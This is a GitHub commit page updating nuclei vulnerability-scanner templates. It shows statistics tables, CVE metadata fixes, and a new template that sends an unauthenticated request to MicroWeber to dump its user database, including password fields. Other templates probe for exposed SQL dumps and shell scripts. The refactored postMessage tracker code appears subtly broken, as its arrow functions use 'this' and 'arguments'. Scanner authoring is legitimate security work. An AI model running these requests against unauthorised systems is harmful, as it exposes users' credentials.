Skip to content

Commit

Permalink
up goby_pocs and nuclei_templates 2022-07-29
Browse files Browse the repository at this point in the history
  • Loading branch information
@x51pwn
x51pwn committed Jul 29, 2022
1 parent 48a9a74 commit a945065
Show file tree
Hide file tree
Showing 96 changed files with 2,283 additions and 1,949 deletions.
24 changes: 12 additions & 12 deletions config/nuclei-templates/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,

| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
| panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
| lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
| xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
| wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | | |
| rce | 313 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 282 | gy741 | 126 | file | 76 | | | | |

**281 directories, 3922 files**.
| cve | 1308 | daffainfo | 614 | cves | 1291 | info | 1368 | http | 3593 |
| panel | 595 | dhiyaneshdk | 504 | exposed-panels | 604 | high | 943 | file | 76 |
| lfi | 487 | pikpikcu | 322 | vulnerabilities | 500 | medium | 778 | network | 50 |
| xss | 445 | pdteam | 269 | technologies | 267 | critical | 442 | dns | 17 |
| wordpress | 406 | geeknik | 187 | exposures | 255 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 215 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 155 | misconfiguration | 210 | | | | |
| rce | 317 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 301 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 283 | gy741 | 126 | file | 76 | | | | |

**283 directories, 3961 files**.

</td>
</tr>
Expand Down
2 changes: 1 addition & 1 deletion config/nuclei-templates/TEMPLATES-STATS.json
View file

Large diffs are not rendered by default.

3,382 changes: 1,704 additions & 1,678 deletions config/nuclei-templates/TEMPLATES-STATS.md
View file

Large diffs are not rendered by default.

20 changes: 10 additions & 10 deletions config/nuclei-templates/TOP-10.md
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 |
| panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 |
| lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 |
| xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 |
| wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | | |
| rce | 313 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 282 | gy741 | 126 | file | 76 | | | | |
| cve | 1308 | daffainfo | 614 | cves | 1291 | info | 1368 | http | 3593 |
| panel | 595 | dhiyaneshdk | 504 | exposed-panels | 604 | high | 943 | file | 76 |
| lfi | 487 | pikpikcu | 322 | vulnerabilities | 500 | medium | 778 | network | 50 |
| xss | 445 | pdteam | 269 | technologies | 267 | critical | 442 | dns | 17 |
| wordpress | 406 | geeknik | 187 | exposures | 255 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 215 | unknown | 7 | | |
| cve2021 | 322 | 0x_akoko | 155 | misconfiguration | 210 | | | | |
| rce | 317 | princechaddha | 147 | workflows | 187 | | | | |
| wp-plugin | 301 | pussycat0x | 128 | default-logins | 101 | | | | |
| tech | 283 | gy741 | 126 | file | 76 | | | | |
47 changes: 47 additions & 0 deletions config/nuclei-templates/cves/2020/CVE-2020-13405.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
id: CVE-2020-13405

info:
name: MicroWeber - Unauthenticated User Database Disclosure
author: ritikchaddha,amit-jd
severity: high
description: |
The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
reference:
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13405
cwe-id: CWE-306
metadata:
shodan-query: http.html:"microweber"
verified: "true"
tags: cve,cve2020,microweber,unauth,disclosure

requests:
- raw:
- |
POST /module/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}admin/view:modules/load_module:users
module={{endpoint}}
payloads:
endpoint:
- "users/controller"
- "modules/users/controller"
- "/modules/users/controller"

matchers:
- type: dsl
dsl:
- 'contains(body,"username")'
- 'contains(body,"password")'
- 'contains(body,"password_reset_hash")'
- 'status_code==200'
- 'contains(all_headers,"text/html")'
condition: and
5 changes: 4 additions & 1 deletion config/nuclei-templates/cves/2021/CVE-2021-40149.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,15 +3,18 @@ id: CVE-2021-40149
info:
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
author: For3stCo1d
severity: high
severity: medium
description: |
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
reference:
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2021-40149
cwe-id: CWE-552
metadata:
shodan-query: http.title:"Reolink"
verified: "true"
Expand Down
4 changes: 2 additions & 2 deletions config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,15 +2,15 @@ id: CVE-2022-0954

info:
name: Microweber - Cross-site Scripting
author: amitj
author: amit-jd
severity: medium
description: |
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
Expand Down
9 changes: 6 additions & 3 deletions config/nuclei-templates/cves/2022/CVE-2022-34046.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,11 +9,14 @@ info:
reference:
- https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34046
cwe-id: CWE-863
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve,cve2022,wavlink,router,exposure

requests:
Expand Down
9 changes: 6 additions & 3 deletions config/nuclei-templates/cves/2022/CVE-2022-34047.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,11 +9,14 @@ info:
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve,cve2022,wavlink,router,exposure

requests:
Expand Down
7 changes: 6 additions & 1 deletion config/nuclei-templates/cves/2022/CVE-2022-34049.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,14 +3,19 @@ id: CVE-2022-34049
info:
name: Wavlink Exportlogs.sh - Configuration Exposure
author: For3stCo1d
severity: high
severity: medium
description: |
An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data.
reference:
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049
- https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-34049
cwe-id: CWE-552
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
Expand Down
27 changes: 27 additions & 0 deletions config/nuclei-templates/exposed-panels/goanywhere-mft-login.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: goanywhere-mft-login

info:
name: GoAnywhere Managed File Transfer Login Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"GoAnywhere Managed File Transfer"
tags: panel,goanywhere,login,filetransfer

requests:
- method: GET
path:
- "{{BaseURL}}/goanywhere/auth/Login.xhtml"

redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "GoAnywhere Managed File Transfer"

- type: status
status:
- 200
3 changes: 2 additions & 1 deletion config/nuclei-templates/exposures/backups/sql-dump.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ id: default-sql-dump

info:
name: MySQL Dump Files
author: geeknik,dwisiswant0
author: geeknik,dwisiswant0,ELSFA7110
severity: medium
tags: exposure,backup,mysql

Expand All @@ -28,6 +28,7 @@ requests:
- "{{BaseURL}}/translate.sql"
- "{{BaseURL}}/users.sql"
- "{{BaseURL}}/wp-content/uploads/dump.sql"
- "{{BaseURL}}/wp-content/mysql.sql"
headers:
Range: "bytes=0-3000"

Expand Down
8 changes: 7 additions & 1 deletion config/nuclei-templates/exposures/files/shellscripts.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,12 @@ requests:
- "{{BaseURL}}/wp-setup.sh"
- "{{BaseURL}}/deploy.sh"
- "{{BaseURL}}/aws.sh"
- "{{BaseURL}}/reminder.sh"
- "{{BaseURL}}/mysqlbackup.sh"
- "{{BaseURL}}/dev2local.sh"
- "{{BaseURL}}/local2dev.sh"
- "{{BaseURL}}/local2prod.sh"
- "{{BaseURL}}/prod2local.sh"

matchers-condition: and
matchers:
Expand All @@ -46,4 +52,4 @@ requests:
- ".*?bin.*?sh"
- ".*?bin.*?bash"
part: body
condition: or
condition: or
41 changes: 20 additions & 21 deletions config/nuclei-templates/headless/postmessage-outgoing-tracker.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,41 +19,40 @@ headless:
args:
hook: true
code: |
(function() {window.alerts = [];
() => {
window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
logger = found => window.alerts.push(found);
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
function getStackTrace() {
var stack;
try {
throw new Error('');
} catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(line => line.trim());
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
var oldSender = window.postMessage;
var oldSender = window.postMessage;
window.postMessage = function(data, origin) {
if(origin == '*'){
logger({stack: getStackTrace(), args: {data, origin}});
return oldSender.apply(this, arguments);
window.postMessage = (data, origin) => {
if (origin == '*') {
logger({stack: getStackTrace(), args: {data, origin}});
return oldSender.apply(this, arguments);
}
};
})();
}
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
code: window.alerts
matchers:
- type: word
part: alerts
Expand Down
45 changes: 22 additions & 23 deletions config/nuclei-templates/headless/postmessage-tracker.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,41 +19,40 @@ headless:
args:
hook: true
code: |
(function() {window.alerts = [];
() => {
window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
logger = found => window.alerts.push(found);
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
function getStackTrace() {
var stack;
try {
throw new Error('');
} catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(line => line.trim());
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
var oldListener = Window.prototype.addEventListener;
var oldListener = Window.prototype.addEventListener;
Window.prototype.addEventListener = function(type, listener, useCapture) {
if(type === 'message') {
logger(getStackTrace());
}
return oldListener.apply(this, arguments);
};
})();
Window.prototype.addEventListener = (type, listener, useCapture) => {
if (type === 'message') {
logger(getStackTrace());
}
return oldListener.apply(this, arguments);
};
}
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
code: window.alerts
matchers:
- type: word
part: alerts
Expand Down
Loading

0 comments on commit a945065

Please sign in to comment.